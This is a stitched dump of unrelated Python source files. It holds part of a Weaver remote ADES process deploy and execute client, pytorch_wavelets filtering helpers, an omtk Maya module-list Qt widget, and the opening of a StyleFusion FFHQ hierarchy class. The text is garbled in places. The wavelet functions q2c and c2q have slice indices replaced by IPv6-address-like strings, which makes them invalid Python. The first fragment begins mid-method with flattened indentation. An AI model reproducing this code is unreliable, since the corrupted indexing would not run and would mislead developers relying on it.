# FIXME: support for Spacebel, always returns dummy visibility response, enforce deploy with `False`
if json_body.get("message") == "magic!" or json_body.get("type") == "ok" or json_body.get("code") == 4:
return False
return json_body.get("value") == VISIBILITY_PUBLIC
response.raise_for_status()
def set_visibility(self, visibility):
self.update_status("Updating process visibility on remote ADES.",
REMOTE_JOB_PROGRESS_VISIBLE, status.STATUS_RUNNING)
path = self.url + sd.process_visibility_service.path.format(process_id=self.process)
user_headers = deepcopy(self.headers)
user_headers.update(self.get_user_auth_header())
LOGGER.debug("Update process WPS visibility request for [%s] at [%s]", self.process, path)
response = self.make_request(method="PUT",
url=path,
json={"value": visibility},
retry=False,
status_code_mock=HTTPOk.code)
response.raise_for_status()
def describe_process(self):
path = self.url + sd.process_service.path.format(process_id=self.process)
LOGGER.debug("Describe process WPS request for [%s] at [%s]", self.process, path)
response = self.make_request(method="GET",
url=path,
retry=False,
status_code_mock=HTTPOk.code)
if response.status_code == HTTPOk.code:
# FIXME: Remove patch for Geomatys ADES (Missing process return a 200 InvalidParameterValue error !)
if response.content.lower().find("InvalidParameterValue") >= 0:
return None
return response.json()
elif response.status_code == HTTPNotFound.code:
return None
# FIXME: Remove patch for Spacebel ADES (Missing process return a 500 error)
elif response.status_code == HTTPInternalServerError.code:
return None
response.raise_for_status()
def deploy(self):
self.update_status("Deploying process on remote ADES.",
REMOTE_JOB_PROGRESS_DEPLOY, status.STATUS_RUNNING)
path = self.url + sd.processes_service.path
user_headers = deepcopy(self.headers)
user_headers.update(self.get_user_auth_header())
LOGGER.debug("Deploy process WPS request for [%s] at [%s]", self.process, path)
response = self.make_request(method="POST", url=path, json=self.deploy_body, retry=True,
status_code_mock=HTTPOk.code)
response.raise_for_status()
def prepare(self):
visible = self.is_visible()
if not visible: # includes private visibility and non-existing cases
if visible is None:
LOGGER.info("Process [%s] access is unauthorized on [%s] - deploying as admin.", self.process, self.url)
elif visible is False:
LOGGER.info("Process [%s] is not deployed on [%s] - deploying.", self.process, self.url)
# TODO: Maybe always redeploy? What about cases of outdated deployed process?
try:
self.deploy()
except Exception as exc:
# FIXME: support for Spacebel, avoid conflict error incorrectly handled, remove 500 when fixed
pass_http_error(exc, [HTTPConflict, HTTPInternalServerError])
if visible:
LOGGER.info("Process [%s] already deployed and visible on [%s] - executing.", self.process, self.url)
else:
LOGGER.info("Process [%s] enforced to public visibility.", self.process)
try:
self.set_visibility(visibility=VISIBILITY_PUBLIC)
# TODO: support for Spacebel, remove when visibility route properly implemented on ADES
except Exception as exc:
pass_http_error(exc, HTTPNotFound)
def execute(self, workflow_inputs, out_dir, expected_outputs):
self.update_status("Preparing process on remote ADES.",
REMOTE_JOB_PROGRESS_PREPARE, status.STATUS_RUNNING)
self.prepare()
self.update_status("Process ready for execute request on remote ADES.",
REMOTE_JOB_PROGRESS_READY, status.STATUS_RUNNING)
LOGGER.debug("Execute process WPS request for [%s]", self.process)
execute_body_inputs = self.stage_job_inputs(workflow_inputs)
execute_body_outputs = [
{"id": output, "transmissionMode": EXECUTE_TRANSMISSION_MODE_REFERENCE} for output in expected_outputs
]
self.update_status("Executing job on remote ADES.", REMOTE_JOB_PROGRESS_EXECUTION, status.STATUS_RUNNING)
execute_body = {
"mode": EXECUTE_MODE_ASYNC,
"response": EXECUTE_RESPONSE_DOCUMENT,
"inputs": execute_body_inputs,
"outputs": execute_body_outputs
}
request_url = self.url + sd.process_jobs_service.path.format(process_id=self.process)
response = self.make_request(method="POST", url=request_url, json=execute_body, retry=True)
if response.status_code != 201:
raise Exception("Was expecting a 201 status code from the execute request : {0}".format(request_url))
job_status_uri = response.headers["Location"]
job_id = self.monitor(job_status_uri)
self.update_status("Fetching job outputs from remote ADES.",
REMOTE_JOB_PROGRESS_FETCH_OUT, status.STATUS_RUNNING)
results = self.get_job_results(job_id)
self.stage_job_results(results, expected_outputs, out_dir)
self.update_status("Execution on remote ADES completed.",
REMOTE_JOB_PROGRESS_COMPLETED, status.STATUS_SUCCEEDED)
def monitor(self, job_status_uri):
job_status = self.get_job_status(job_status_uri)
job_status_value = status.map_status(job_status["status"])
job_id = job_status["jobID"]
self.update_status("Monitoring job on remote ADES : {0}".format(job_status_uri),
REMOTE_JOB_PROGRESS_MONITORING, status.STATUS_RUNNING)
while job_status_value not in status.JOB_STATUS_CATEGORIES[status.JOB_STATUS_CATEGORY_FINISHED]:
sleep(5)
job_status = self.get_job_status(job_status_uri)
job_status_value = status.map_status(job_status["status"])
LOGGER.debug(get_log_monitor_msg(job_id, job_status_value,
job_status.get("percentCompleted", 0),
get_any_message(job_status), job_status.get("statusLocation")))
self.update_status(get_job_log_msg(status=job_status_value,
message=get_any_message(job_status),
progress=job_status.get("percentCompleted", 0),
duration=job_status.get("duration", None)), # get if available
map_progress(job_status.get("percentCompleted", 0),
REMOTE_JOB_PROGRESS_MONITORING, REMOTE_JOB_PROGRESS_FETCH_OUT),
status.STATUS_RUNNING)
if job_status_value != status.STATUS_SUCCEEDED:
LOGGER.debug(get_log_monitor_msg(job_id, job_status_value,
job_status.get("percentCompleted", 0),
get_any_message(job_status), job_status.get("statusLocation")))
raise Exception(job_status)
return job_id
def get_job_status(self, job_status_uri, retry=True):
response = self.make_request(method="GET",
url=job_status_uri,
retry=True,
status_code_mock=HTTPNotFound.code)
# Retry on 404 since job may not be fully ready
if retry and response.status_code == HTTPNotFound.code:
sleep(5)
return self.get_job_status(job_status_uri, retry=False)
response.raise_for_status()
job_status = response.json()
# TODO Remove patch for Geomatys not conforming to the status schema
# - jobID is missing
# - handled by 'map_status': status are upper cases and succeeded process are indicated as successful
job_id = job_status_uri.split("/")[-1]
if "jobID" not in job_status:
job_status["jobID"] = job_id
job_status["status"] = status.map_status(job_status["status"])
return job_status
def get_job_results(self, job_id):
# type: (str) -> List[JSON]
"""
Obtains produced output results from successful job status ID.
"""
# use results endpoint instead of '/outputs' to ensure support with other
result_url = self.url + sd.process_results_service.path.format(process_id=self.process, job_id=job_id)
response = self.make_request(method="GET", url=result_url, retry=True)
response.raise_for_status()
contents = response.json()
# backward compatibility for ADES that returns output IDs nested under 'outputs'
if "outputs" in contents:
# ensure that we don't incorrectly pick a specific output ID named 'outputs'
maybe_outputs = contents["outputs"]
if isinstance(maybe_outputs, dict) and get_any_id(maybe_outputs) is None:
contents = maybe_outputs
# backward compatibility for ADES that returns list of outputs nested under 'outputs'
# (i.e.: as Weaver-specific '/outputs' endpoint)
elif isinstance(maybe_outputs, list) and all(get_any_id(out) is not None for out in maybe_outputs):
contents = maybe_outputs
# rebuild the expected (old) list format for calling method
if isinstance(contents, dict) and all(get_any_value(out) is not None for out in contents.values()):
outputs = []
for out_id, out_val in contents.items():
out_val.update({"id": out_id})
outputs.append(out_val)
contents = outputs
return contents
def stage_job_results(self, results, expected_outputs, out_dir):
for result in results:
res_id = get_any_id(result)
# CWL expect the output file to be written matching definition in 'expected_outputs',
# but this definition could be a glob pattern to match multiple file.
# Therefore, we cannot rely on a specific name from it.
if res_id in expected_outputs:
# plan ahead when list of multiple output values could be supported
result_values = get_any_value(result)
if not isinstance(result_values, list):
result_values = [result_values]
cwl_out_dir = out_dir.rstrip("/")
for value in result_values:
src_name = value.split("/")[-1]
dst_path = "/".join([cwl_out_dir, src_name])
# performance improvement:
# Bypass download if file can be resolved as local resource (already fetched or same server).
# Because CWL expects the file to be in specified 'out_dir', make a link for it to be found
# even though the file is stored in the full job output location instead (already staged by step).
map_path = map_wps_output_location(value, self.settings)
as_link = False
if map_path:
LOGGER.info("Detected result [%s] from [%s] as local reference to this instance. "
"Skipping fetch and using local copy in output destination: [%s]",
res_id, value, dst_path)
LOGGER.debug("Mapped result [%s] to local reference: [%s]", value, map_path)
src_path = map_path
as_link = True
else:
LOGGER.info("Fetching result [%s] from [%s] to CWL output destination: [%s]",
res_id, value, dst_path)
src_path = value
fetch_file(src_path, cwl_out_dir, settings=self.settings, link=as_link)
def stage_job_inputs(self, workflow_inputs):
execute_body_inputs = []
for workflow_input_key, workflow_input_value in workflow_inputs.items():
if not isinstance(workflow_input_value, list):
workflow_input_value = [workflow_input_value]
for workflow_input_value_item in workflow_input_value:
if isinstance(workflow_input_value_item, dict) and "location" in workflow_input_value_item:
location = workflow_input_value_item["location"]
execute_body_inputs.append({"id": workflow_input_key, "href": location})
else:
execute_body_inputs.append({"id": workflow_input_key, "data": workflow_input_value_item})
for exec_input in execute_body_inputs:
if "href" in exec_input and isinstance(exec_input["href"], str):
LOGGER.debug("Original input location [%s] : [%s]", exec_input["id"], exec_input["href"])
if exec_input["href"].startswith("{0}://".format(OPENSEARCH_LOCAL_FILE_SCHEME)):
exec_input["href"] = "file{0}".format(exec_input["href"][len(OPENSEARCH_LOCAL_FILE_SCHEME):])
LOGGER.debug("OpenSearch intermediate input [%s] : [%s]", exec_input["id"], exec_input["href"])
elif exec_input["href"].startswith("file://"):
exec_input["href"] = self.host_file(exec_input["href"])
LOGGER.debug("Hosting intermediate input [%s] : [%s]", exec_input["id"], exec_input["href"])
return execute_body_inputs
|
498990
|
from __future__ import absolute_import
import torch
import torch.nn.functional as F
import numpy as np
from pytorch_wavelets.utils import symm_pad_1d as symm_pad
def as_column_vector(v):
"""Return *v* as a column vector with shape (N,1).
"""
v = np.atleast_2d(v)
if v.shape[0] == 1:
return v.T
else:
return v
def _as_row_vector(v):
"""Return *v* as a row vector with shape (1, N).
"""
v = np.atleast_2d(v)
if v.shape[0] == 1:
return v
else:
return v.T
def _as_row_tensor(h):
if isinstance(h, torch.Tensor):
h = torch.reshape(h, [1, -1])
else:
h = as_column_vector(h).T
h = torch.tensor(h, dtype=torch.get_default_dtype())
return h
def _as_col_vector(v):
"""Return *v* as a column vector with shape (N,1).
"""
v = np.atleast_2d(v)
if v.shape[0] == 1:
return v.T
else:
return v
def _as_col_tensor(h):
if isinstance(h, torch.Tensor):
h = torch.reshape(h, [-1, 1])
else:
h = as_column_vector(h)
h = torch.tensor(h, dtype=torch.get_default_dtype())
return h
def prep_filt(h, c, transpose=False):
""" Prepares an array to be of the correct format for pytorch.
Can also specify whether to make it a row filter (set tranpose=True)"""
h = _as_col_vector(h)[::-1]
h = h[None, None, :]
h = np.repeat(h, repeats=c, axis=0)
if transpose:
h = h.transpose((0,1,3,2))
h = np.copy(h)
return torch.tensor(h, dtype=torch.get_default_dtype())
def colfilter(X, h, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
b, ch, row, col = X.shape
m = h.shape[2] // 2
if mode == 'symmetric':
xe = symm_pad(row, m)
X = F.conv2d(X[:,:,xe], h.repeat(ch,1,1,1), groups=ch)
else:
X = F.conv2d(X, h.repeat(ch, 1, 1, 1), groups=ch, padding=(m, 0))
return X
def rowfilter(X, h, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
b, ch, row, col = X.shape
m = h.shape[2] // 2
h = h.transpose(2,3).contiguous()
if mode == 'symmetric':
xe = symm_pad(col, m)
X = F.conv2d(X[:,:,:,xe], h.repeat(ch,1,1,1), groups=ch)
else:
X = F.conv2d(X, h.repeat(ch,1,1,1), groups=ch, padding=(0, m))
return X
def coldfilt(X, ha, hb, highpass=False, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
batch, ch, r, c = X.shape
r2 = r // 2
if r % 4 != 0:
raise ValueError('No. of rows in X must be a multiple of 4\n' +
'X was {}'.format(X.shape))
if mode == 'symmetric':
m = ha.shape[2]
xe = symm_pad(r, m)
X = torch.cat((X[:,:,xe[2::2]], X[:,:,xe[3::2]]), dim=1)
h = torch.cat((ha.repeat(ch, 1, 1, 1), hb.repeat(ch, 1, 1, 1)), dim=0)
X = F.conv2d(X, h, stride=(2,1), groups=ch*2)
else:
raise NotImplementedError()
# Reshape result to be shape [Batch, ch, r/2, c]. This reshaping
# interleaves the columns
if highpass:
X = torch.stack((X[:, ch:], X[:, :ch]), dim=-2).view(batch, ch, r2, c)
else:
X = torch.stack((X[:, :ch], X[:, ch:]), dim=-2).view(batch, ch, r2, c)
return X
def rowdfilt(X, ha, hb, highpass=False, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
batch, ch, r, c = X.shape
c2 = c // 2
if c % 4 != 0:
raise ValueError('No. of cols in X must be a multiple of 4\n' +
'X was {}'.format(X.shape))
if mode == 'symmetric':
m = ha.shape[2]
xe = symm_pad(c, m)
X = torch.cat((X[:,:,:,xe[2::2]], X[:,:,:,xe[3::2]]), dim=1)
h = torch.cat((ha.reshape(1,1,1,m).repeat(ch, 1, 1, 1),
hb.reshape(1,1,1,m).repeat(ch, 1, 1, 1)), dim=0)
X = F.conv2d(X, h, stride=(1,2), groups=ch*2)
else:
raise NotImplementedError()
# Reshape result to be shape [Batch, ch, r/2, c]. This reshaping
# interleaves the columns
if highpass:
Y = torch.stack((X[:, ch:], X[:, :ch]), dim=-1).view(batch, ch, r, c2)
else:
Y = torch.stack((X[:, :ch], X[:, ch:]), dim=-1).view(batch, ch, r, c2)
return Y
def colifilt(X, ha, hb, highpass=False, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
m = ha.shape[2]
m2 = m // 2
hao = ha[:,:,1::2]
hae = ha[:,:,::2]
hbo = hb[:,:,1::2]
hbe = hb[:,:,::2]
batch, ch, r, c = X.shape
if r % 2 != 0:
raise ValueError('No. of rows in X must be a multiple of 2.\n' +
'X was {}'.format(X.shape))
xe = symm_pad(r, m2)
if m2 % 2 == 0:
h1 = hae
h2 = hbe
h3 = hao
h4 = hbo
if highpass:
X = torch.cat((X[:,:,xe[1:-2:2]], X[:,:,xe[:-2:2]], X[:,:,xe[3::2]], X[:,:,xe[2::2]]), dim=1)
else:
X = torch.cat((X[:,:,xe[:-2:2]], X[:,:,xe[1:-2:2]], X[:,:,xe[2::2]], X[:,:,xe[3::2]]), dim=1)
else:
h1 = hao
h2 = hbo
h3 = hae
h4 = hbe
if highpass:
X = torch.cat((X[:,:,xe[2:-1:2]], X[:,:,xe[1:-1:2]], X[:,:,xe[2:-1:2]], X[:,:,xe[1:-1:2]]), dim=1)
else:
X = torch.cat((X[:,:,xe[1:-1:2]], X[:,:,xe[2:-1:2]], X[:,:,xe[1:-1:2]], X[:,:,xe[2:-1:2]]), dim=1)
h = torch.cat((h1.repeat(ch, 1, 1, 1), h2.repeat(ch, 1, 1, 1),
h3.repeat(ch, 1, 1, 1), h4.repeat(ch, 1, 1, 1)), dim=0)
X = F.conv2d(X, h, groups=4*ch)
# Stack 4 tensors of shape [batch, ch, r2, c] into one tensor
# [batch, ch, r2, 4, c]
X = torch.stack([X[:,:ch], X[:,ch:2*ch], X[:,2*ch:3*ch], X[:,3*ch:]], dim=3).view(batch, ch, r*2, c)
return X
def rowifilt(X, ha, hb, highpass=False, mode='symmetric'):
if X is None or X.shape == torch.Size([]):
return torch.zeros(1,1,1,1, device=X.device)
m = ha.shape[2]
m2 = m // 2
hao = ha[:,:,1::2]
hae = ha[:,:,::2]
hbo = hb[:,:,1::2]
hbe = hb[:,:,::2]
batch, ch, r, c = X.shape
if c % 2 != 0:
raise ValueError('No. of cols in X must be a multiple of 2.\n' +
'X was {}'.format(X.shape))
xe = symm_pad(c, m2)
if m2 % 2 == 0:
h1 = hae
h2 = hbe
h3 = hao
h4 = hbo
if highpass:
X = torch.cat((X[:,:,:,xe[1:-2:2]], X[:,:,:,xe[:-2:2]], X[:,:,:,xe[3::2]], X[:,:,:,xe[2::2]]), dim=1)
else:
X = torch.cat((X[:,:,:,xe[:-2:2]], X[:,:,:,xe[1:-2:2]], X[:,:,:,xe[2::2]], X[:,:,:,xe[3::2]]), dim=1)
else:
h1 = hao
h2 = hbo
h3 = hae
h4 = hbe
if highpass:
X = torch.cat((X[:,:,:,xe[2:-1:2]], X[:,:,:,xe[1:-1:2]], X[:,:,:,xe[2:-1:2]], X[:,:,:,xe[1:-1:2]]), dim=1)
else:
X = torch.cat((X[:,:,:,xe[1:-1:2]], X[:,:,:,xe[2:-1:2]], X[:,:,:,xe[1:-1:2]], X[:,:,:,xe[2:-1:2]]), dim=1)
h = torch.cat((h1.repeat(ch, 1, 1, 1), h2.repeat(ch, 1, 1, 1),
h3.repeat(ch, 1, 1, 1), h4.repeat(ch, 1, 1, 1)),
dim=0).reshape(4*ch, 1, 1, m2)
X = F.conv2d(X, h, groups=4*ch)
# Stack 4 tensors of shape [batch, ch, r2, c] into one tensor
# [batch, ch, r2, 4, c]
X = torch.stack([X[:,:ch], X[:,ch:2*ch], X[:,2*ch:3*ch], X[:,3*ch:]], dim=4).view(batch, ch, r, c*2)
return X
# def q2c(y, dim=-1):
def q2c(y, dim=-1):
"""
Convert from quads in y to complex numbers in z.
"""
# Arrange pixels from the corners of the quads into
# 2 subimages of alternate real and imag pixels.
# a----b
# | |
# | |
# c----d
# Combine (a,b) and (d,c) to form two complex subimages.
y = y/np.sqrt(2)
a, b = y[:,:, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 0::2], y[:,:, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 1::2]
c, d = y[:,:, fdf8:f53e:61e4::18, 0::2], y[:,:, fdf8:f53e:61e4::18, 1::2]
# return torch.stack((a-d, b+c), dim=dim), torch.stack((a+d, b-c), dim=dim)
return ((a-d, b+c), (a+d, b-c))
def c2q(w1, w2):
"""
Scale by gain and convert from complex w(:,:,1:2) to real quad-numbers
in z.
Arrange pixels from the real and imag parts of the 2 highpasses
into 4 separate subimages .
A----B Re Im of w(:,:,1)
| |
| |
C----D Re Im of w(:,:,2)
"""
w1r, w1i = w1
w2r, w2i = w2
x1 = w1r + w2r
x2 = w1i + w2i
x3 = w1i - w2i
x4 = -w1r + w2r
# Get the shape of the tensor excluding the real/imagniary part
b, ch, r, c = w1r.shape
# Create new empty tensor and fill it
y = w1r.new_zeros((b, ch, r*2, c*2), requires_grad=w1r.requires_grad)
y[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b,::2] = x1
y[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 1::2] = x2
y[:, :, fdf8:f53e:61e4::18, ::2] = x3
y[:, :, fdf8:f53e:61e4::18, 1::2] = x4
y /= np.sqrt(2)
return y
|
499078
|
import re
import functools
import inspect
import traceback
import logging
import pymel.core as pymel
from PySide import QtCore
from PySide import QtGui
from ui import widget_list_modules
from omtk.libs import libSkinning
from omtk.libs import libQt
from omtk.libs import libPython
from omtk.libs import libPymel
from omtk.core import constants
from omtk.core import classModule
from omtk.core import classRig
import ui_shared
log = logging.getLogger('omtk')
class WidgetListModules(QtGui.QWidget):
needExportNetwork = QtCore.Signal()
_color_invalid = QtGui.QBrush(QtGui.QColor(255, 45, 45))
_color_valid = QtGui.QBrush(QtGui.QColor(45, 45, 45))
_color_locked = QtGui.QBrush(QtGui.QColor(125, 125, 125))
def __init__(self, parent=None):
super(WidgetListModules, self).__init__(parent=parent)
self._rig = None
self._rigs = None
self._is_modifying = False # todo: document
self.ui = widget_list_modules.Ui_Form()
self.ui.setupUi(self)
# Tweak gui
self.ui.treeWidget.setStyleSheet(ui_shared._STYLE_SHEET)
# Connect signal
# Connect events
self.ui.lineEdit_search.textChanged.connect(self.on_module_query_changed)
self.ui.treeWidget.itemSelectionChanged.connect(self.on_module_selection_changed)
self.ui.treeWidget.itemChanged.connect(self.on_module_changed)
self.ui.treeWidget.itemDoubleClicked.connect(self.on_module_double_clicked)
self.ui.treeWidget.focusInEvent = self.focus_in_module
self.ui.treeWidget.customContextMenuRequested.connect(self.on_context_menu_request)
self.ui.btn_update.pressed.connect(self.update)
def set_rigs(self, rig, update=True):
self._rigs = rig
self._rig = next(iter(self._rigs), None)
if update:
self.update()
def get_selected_networks(self):
result = []
for item in self.ui.treeWidget.selectedItems():
if hasattr(item, 'net'):
result.append(item.net)
return result
def get_selected_modules(self):
result = []
for item in self.ui.treeWidget.selectedItems():
val = item.rig
result.append(val)
return result
def update(self, *args, **kwargs):
self.ui.treeWidget.clear()
if not self._rigs:
return
for root in self._rigs:
qItem = self._rig_to_tree_widget(root)
self.ui.treeWidget.addTopLevelItem(qItem)
self.ui.treeWidget.expandItem(qItem)
self.refresh_ui()
def refresh_ui(self):
self._refresh_ui_modules_checked()
self._refresh_ui_modules_visibility()
def _refresh_ui_modules_checked(self):
# Block the signal to make sure that the itemChanged event is not called when adjusting the check state
self.ui.treeWidget.blockSignals(True)
for qt_item in libQt.get_all_QTreeWidgetItem(self.ui.treeWidget):
if hasattr(qt_item, "rig"):
qt_item.setCheckState(0, QtCore.Qt.Checked if qt_item.rig.is_built() else QtCore.Qt.Unchecked)
self.ui.treeWidget.blockSignals(False)
def _refresh_ui_modules_visibility(self, query_regex=None):
if query_regex is None:
query_raw = self.ui.lineEdit_search.text()
query_regex = ".*{0}.*".format(query_raw) if query_raw else ".*"
def fn_can_show(qItem, query_regex):
# Always shows non-module
if not hasattr(qItem, 'rig'):
return True
if not isinstance(qItem.rig, classModule.Module):
return True
module = qItem.rig # Retrieve monkey-patched data
module_name = str(module)
return not query_regex or re.match(query_regex, module_name, re.IGNORECASE)
# unselectableBrush = QtGui.QBrush(QtCore.Qt.darkGray)
# selectableBrush = QtGui.QBrush(QtCore.Qt.white)
for qt_item in libQt.get_all_QTreeWidgetItem(self.ui.treeWidget):
can_show = fn_can_show(qt_item, query_regex)
qt_item.setHidden(not can_show)
# Block signals need to be called in a function because if called in a signal, it will block it
def _set_text_block(self, item, str):
self.ui.treeWidget.blockSignals(True)
if hasattr(item, "rig"):
item.setText(0, str)
self.ui.treeWidget.blockSignals(False)
def _can_build(self, data, verbose=True):
validate_message = None
try:
if isinstance(data, classRig.Rig):
data.validate()
elif isinstance(data, classModule.Module):
data.validate()
else:
raise Exception("Unexpected datatype {0} for {1}".format(type(data), data))
except Exception, e:
if verbose:
validate_message = str(e)
pymel.warning("{0} failed validation: {1}".format(data, str(e)))
return False, validate_message
return True, validate_message
def _build_module(self, module):
if module.locked:
pymel.warning("Can't build locked module {0}".format(module))
return
self._rig.pre_build()
module.build()
self._rig.post_build_module(module)
return True
def _unbuild_module(self, module):
if module.locked:
pymel.warning("Can't unbuild locked module {0}".format(module))
return
module.unbuild()
return True
def _build(self, val):
if val.is_built():
pymel.warning("Can't build {0}, already built.".format(val))
return
try:
if isinstance(val, classModule.Module):
self._build_module(val)
elif isinstance(val, classRig.Rig):
val.build()
else:
raise Exception("Unexpected datatype {0} for {1}".format(type(val), val))
except Exception, e:
log.error("Error building {0}. Received {1}. {2}".format(val, type(e).__name__, str(e).strip()))
traceback.print_exc()
def _unbuild(self, val):
if not val.is_built():
pymel.warning("Can't unbuild {0}, already unbuilt.".format(val))
return
try:
if isinstance(val, classModule.Module):
self._unbuild_module(val)
elif isinstance(val, classRig.Rig):
val.unbuild()
else:
raise Exception("Unexpected datatype {0} for {1}".format(type(val), val))
except Exception, e:
log.error("Error building {0}. Received {1}. {2}".format(val, type(e).__name__, str(e).strip()))
traceback.print_exc()
def _rig_to_tree_widget(self, module):
qItem = QtGui.QTreeWidgetItem(0)
if hasattr(module, '_network'):
qItem.net = module._network
else:
pymel.warning("{0} have no _network attributes".format(module))
qItem.rig = module
# Set label
label = str(module)
if isinstance(module, classModule.Module) and module.locked:
label += ' (locked)'
qItem.setText(0, label)
# HACK: bypass the stylecheet
# see: http://forum.qt.io/topic/22219/item-view-stylesheet-bgcolor/12
# style_sheet_invalid = """
# QTreeView::item
# {
# background-color: rgb(45,45,45);
# }"""
self._set_QTreeWidgetItem_color(qItem, module)
qItem._name = qItem.text(0)
qItem._checked = module.is_built()
qItem.setFlags(qItem.flags() | QtCore.Qt.ItemIsEditable)
qItem.setCheckState(0, QtCore.Qt.Checked if module.is_built() else QtCore.Qt.Unchecked)
if isinstance(module, classRig.Rig):
qItem.setIcon(0, QtGui.QIcon(":/out_character.png"))
sorted_modules = sorted(module, key=lambda mod: mod.name)
for child in sorted_modules:
qSubItem = self._rig_to_tree_widget(child)
qSubItem.setIcon(0, QtGui.QIcon(":/out_objectSet.png"))
for input in child.input:
qInputItem = QtGui.QTreeWidgetItem(0)
qInputItem.setText(0, input.name())
ui_shared._set_icon_from_type(input, qInputItem)
qInputItem.setFlags(qItem.flags() & QtCore.Qt.ItemIsSelectable)
qSubItem.addChild(qInputItem)
qItem.addChild(qSubItem)
return qItem
def _set_QTreeWidgetItem_color(self, qItem, module):
desired_color = None
# Set QTreeWidgetItem gray if the module fail validation
if isinstance(module, classModule.Module) and module.locked:
return self._color_locked
# Set QTreeWidgetItem red if the module fail validation
can_build, validation_message = self._can_build(module, verbose=True)
if not can_build:
desired_color = self._color_invalid
msg = 'Validation failed for {0}: {1}'.format(module, validation_message)
log.warning(msg)
qItem.setToolTip(0, msg)
if desired_color:
qItem.setBackground(0, desired_color)
#
# Events
#
def on_build_selected(self):
for val in self.get_selected_modules():
self._build(val)
ui_shared._update_network(self._rig)
self.update()
def on_unbuild_selected(self):
for qItem in self.ui.treeWidget.selectedItems():
val = qItem.rig
self._unbuild(val)
ui_shared._update_network(self._rig)
self.update()
def on_rebuild_selected(self):
for qItem in self.ui.treeWidget.selectedItems():
val = qItem.rig
self._unbuild(val)
self._build(val)
ui_shared._update_network(self._rig)
def on_module_selection_changed(self):
pymel.select(self.get_selected_networks())
def on_module_changed(self, item):
# todo: handle exception
# Check first if the checkbox have changed
need_update = False
new_state = item.checkState(0) == QtCore.Qt.Checked
new_text = item.text(0)
module = item.rig
if item._checked != new_state:
item._checked = new_state
# Handle checkbox change
if new_state:
self._build(module)
else:
self._unbuild(module)
need_update = True
ui_shared._update_network(self._rig, item=item)
# Check if the name have changed
if (item._name != new_text):
item._name = new_text
module.name = new_text
# Update directly the network value instead of re-exporting it
if hasattr(item, "net"):
name_attr = item.net.attr("name")
name_attr.set(new_text)
# Ensure to only refresh the UI and not recreate all
if need_update:
self.refresh_ui()
def on_module_query_changed(self, *args, **kwargs):
self._refresh_ui_modules_visibility()
def on_context_menu_request(self):
if self.ui.treeWidget.selectedItems():
menu = QtGui.QMenu()
actionBuild = menu.addAction("Build")
actionBuild.triggered.connect(self.on_build_selected)
actionUnbuild = menu.addAction("Unbuild")
actionUnbuild.triggered.connect(self.on_unbuild_selected)
actionRebuild = menu.addAction("Rebuild")
actionRebuild.triggered.connect(self.on_rebuild_selected)
menu.addSeparator()
actionLock = menu.addAction("Lock")
actionLock.triggered.connect(self.on_lock_selected)
action_unlock = menu.addAction("Unlock")
action_unlock.triggered.connect(self.on_unlock_selected)
menu.addSeparator()
sel = self.ui.treeWidget.selectedItems()
if len(sel) == 1:
actionRemove = menu.addAction("Rename")
# actionRemove.triggered.connect(functools.partial(self.ui.treeWidget.editItem, sel[0], 0))
actionRemove.triggered.connect(functools.partial(self.ui.treeWidget.itemDoubleClicked.emit, sel[0], 0))
actionRemove = menu.addAction("Remove")
actionRemove.triggered.connect(functools.partial(self.on_remove))
# Expose decorated functions
inst = sel[0].rig
def is_exposed(val):
if not hasattr(val, '__can_show__'):
return False
fn = getattr(val, '__can_show__')
if fn is None:
return False
# if not inspect.ismethod(fn):
# return False
return val.__can_show__()
functions = inspect.getmembers(inst, is_exposed)
if functions:
menu.addSeparator()
for fn_name, fn in functions:
fn_nicename = fn_name.replace('_', ' ').title()
fn = functools.partial(self._execute_rcmenu_entry, fn_name)
action = menu.addAction(fn_nicename)
action.triggered.connect(fn)
menu.exec_(QtGui.QCursor.pos())
def _execute_rcmenu_entry(self, fn_name):
need_export_network = False
for module in self.get_selected_modules():
# Resolve fn
if not hasattr(module, fn_name):
continue
fn = getattr(module, fn_name)
if not inspect.ismethod(fn):
continue
# Call fn
log.debug("Calling {0} on {1}".format(fn_name, module))
fn()
if constants.UIExposeFlags.trigger_network_export in fn._flags:
need_export_network = True
if need_export_network:
self.needExportNetwork.emit()
def on_module_double_clicked(self, item):
if hasattr(item, "rig"):
self._set_text_block(item, item.rig.name)
self._is_modifying = True # Flag to know that we are currently modifying the name
self.ui.treeWidget.editItem(item, 0)
def focus_in_module(self, event):
# Set back the text with the information about the module in it
if self._is_modifying:
sel = self.ui.treeWidget.selectedItems()
if sel:
self._set_text_block(sel[0], str(sel[0].rig))
# sel[0].setText(0, str(sel[0].rig))
self._is_modifying = False
self.focusInEvent(event)
def on_lock_selected(self):
need_update = False
for item in self.ui.treeWidget.selectedItems():
val = item.rig
if isinstance(val, classModule.Module) and not val.locked:
need_update = True
val.locked = True
if need_update:
ui_shared._update_network(self._rig)
self.update()
def on_unlock_selected(self):
need_update = False
for item in self.ui.treeWidget.selectedItems():
val = item.rig
if isinstance(val, classModule.Module) and val.locked:
need_update = True
val.locked = False
if need_update:
ui_shared._update_network(self._rig)
self.update()
def on_remove(self):
for item in self.ui.treeWidget.selectedItems():
module = item.rig
# net = item.net if hasattr(item, "net") else None
try:
if module.is_built():
module.unbuild()
self._rig.remove_module(module)
except Exception, e:
log.error("Error building {0}. Received {1}. {2}".format(module, type(e).__name__, str(e).strip()))
traceback.print_exc()
self.needExportNetwork.emit()
|
499082
|
import torch
from stylefusion.fusion_net import FusionNet
class SFHierarchyFFHQ:
def __init__(self):
self.nodes = dict()
self.nodes["clothes"] = SFNode("clothes")
self.nodes["mouth"] = SFNode("mouth")
self.nodes["eyes"] = SFNode("eyes")
self.nodes["bg"] = SFNode("bg")
self.nodes["hair"] = SFNode("hair")
self.nodes["skin"] = SFNode("skin")
self.nodes["skin_mouth"] = SFNode("skin_mouth", child1=self.nodes["mouth"], child2=self.nodes["skin"])
self.nodes["face"] = SFNode("face", child1=self.nodes["skin_mouth"], child2=self.nodes["eyes"])
